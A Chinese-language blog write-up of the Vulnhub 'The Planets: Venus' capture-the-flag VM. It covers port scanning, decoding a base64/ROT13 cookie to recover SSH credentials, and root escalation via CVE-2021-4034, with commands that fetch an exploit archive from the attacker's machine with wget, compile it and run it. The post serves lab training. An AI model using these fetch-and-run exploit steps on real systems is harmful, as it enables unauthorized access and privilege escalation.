看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus

已于 2023-08-17 14:47:00 修改
阅读量749 收藏 4
点赞数 3
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: Vulnhub靶机 CVE-2021-4034漏洞 缓冲区溢出提权 Cookie值替换 解密 SSH登入
于 2023-07-10 15:02:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/131636314
版权

Vulnhub靶机The Planets:Venus渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/theplanets/Venus.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.102

使用命令:nmap -sS -sV -A -n -p- 192.168.0.102

在这里插入图片描述

开启了808022端口访问8080,通过分析可以得出这是个Python的网页Django框这里有提示:可以使用guest账号登入密码一样。

在这里插入图片描述

登入成功后看到有个金星得图片,接着使用dirsearch 扫一下发现都重定向到 Django 管理登入界面

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

venusbase64加密然后 抓包生成得venus:thrfgirahf使用Rot13解密后得到密码也为venus
得到bWFnZWxsYW46aXJhaGZ2bmF0cmJ5YnRsMTk4OQ== base64解密后为magellan:irahfvnatrbybtl1989
在进行rot13解密得到:venusiangeology1989

最终得到账号密码为:magellan/venusiangeology1989 网页尝试无果,尝试SSH登入,登入成功!!!

②:SSH登入:

登入成功获取第一个FLAG。
在这里插入图片描述

③:CVE-2021-4034漏洞提权:

使用命令:find / -perm -u=s -type f 2>/dev/null 查看可以利用得权限

在这里插入图片描述
Mercury一样可以使用这个提权 这里就方便多了,靶机里面有unzip 不需要使用tar在进行打包解压了

cd /tmp
wget http://192.168.0.105/CVE-2021-4034-main.zip
unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main/
make  
./cve-2021-4034

在这里插入图片描述

④:获取FLAG:

在这里插入图片描述

⑤:缓冲区溢出和提权:

这里我不会想学得可以参考:https://medium.com/@mcl0x90/the-planets-venus-vulnhub-write-up-f6727d08bafb

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度高,主要i是最后得提权吧

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息
2.替换Cookie值 进行解密 Base64Rot13解密
3.CVE-2021-4034漏洞得利用(漏洞很强大!)
4.缓冲区溢出提权(参考大佬wp 比较难 不太会)

在这里插入图片描述

The Planets系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

落寞的魚丶
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Vulnhub DC-8靶场
weixin_47019868的博客
11-22 198
Vulnhub DC-8靶场
Vulnhub-Moneybox
GALi_233的博客
07-23 964
Description 本次靶机来自vulnhub MONEYBOX 1 。靶机中存在3个flag,本次目标是拿到这3个flag,废话不多说开始把吧。 扫描与服务识别 靶机与Kali处在同一网段,通过二层扫描(arp-scan)同网段的存活IP sudo arp-scan -I eth0 -l # -I 网卡 -l 本地网络 通过判断,192.168.54.250为靶机地址。 扫描该靶机的开放端口 sudo nmap -p- 192.168.54.250 发现21,22,80端口,对这些端口进
vulnhub靶场——THE PLANETS:VENUS
Czheisenberg的博客
02-12 1061
THE PLANETS: VENUS 准备 攻击机: kali 靶机: THE PLANETS: VENUS NAT 192.168.91.0 网段 下载连接: https://www.vulnhub.com/entry/the-planets-venus,705/ ![8b10717b2e9b3e632be8d3ce5d0f2d34.png][8b10717b2e9b3e632be8d3ce5d0f2d34] 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24
Vulnhub-shenron-1
lionwerson的博客
01-05 1753
nmap扫描端口: nmap 192.168.0.19 -p- ???? 开放80端口和22端口 web浏览器打开80端口: ???? Apache服务的默认页面 web扫描器识别到是joomla框架: gobuster扫描joomal后台路径: gobuster.exe dir -u http://192.168.0.19/joomla/ -w dir.txt ???? 后台路径是joomla/administrator/index.php 登录名和密码在/test/password文件的
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4579
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Fawkes(vulnhub)
wcl20010的博客
05-29 1118
HarryPotter: Fawkes ~ VulnHub靶机难度高 目录 1.主机发现 2. 端口扫描 3.漏洞发现 Ftp 4.缓冲区溢出 使用edb调试server_hogwarts 攻击思路: 确定溢出位置: 5.反弹shell 构造exp 拿下靶机shell 升级shell 6.提权(信息收集) 信息收集 流量分析 提权 漏洞检测 漏洞利用 找网上的exp测试 ​编辑 执行 1.主机发现 arp-scan -l 2. 端口扫描
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
你怎么用Vulnhub来搭建环境
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
小白的靶机VulnHub-Web Developer
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7638
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
YouthBelief的博客
12-05 2298
VulnOSv2 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web思路步骤一:枚举目录+主页挖掘步骤二:OpenDocMan v1.2.7 cms利用步骤三:尝试利用账号面ssh连接webmin0x03 提权步骤四:内核漏洞提权0x04 总结 0x00 环境搭建 VritualBox配置网络为 host-only VMware中kali加入 host-only 为Virtual Box的网卡 开启虚拟机报错 usb 2.0 什么的问题 修改usb设备为1.0 0x01 信息
记一次vulnhub|渗透测试 DC-9
crispr的博客
01-15 2549
vulnhub DC-9 0X01 Main Point 1.Sqlmap的基本使用 2.LFI的利用 3.Port Knocking–端口敲门服务 4.hydra的基本使用–爆破ssh 5.sudo权限的枚举 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP 得到靶机IP 172.20.10.10, nmap探测靶机开放的端口服务; 靶机开放了80和22端...
小白实战vulnhub DC1
jelly
06-20 718
来了来了,第一次玩渗透靶机,有点激动,这篇博文主要用于笔记记录作用,有很多不对之处希望得到大家的指。 环境介绍 靶机:安装在virtualbox上的虚拟机 DC1 192.168.56.102 攻击机:Kali 192.168.56.1 网络配置 鉴于这是第一个靶机,后面的靶机基本都是使用相同的网络配置,这里得说明下网络设置 我对这方面了解也不多,只能说下能让自己能理解通的歪道理。 每次我打开虚拟机时,kali主机就会出现vboxnet0网卡 我理解为在virtualbox中使用这块网卡为其..
带妹玩转Vulnhub【五】
BadRer的博客
10-01 769
前言 今天晚上听说炫酷的女装大佬国庆期间要出去旅游,不能带我飞,很伤心
vulnhub靶机——raven: 2
最新发布
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值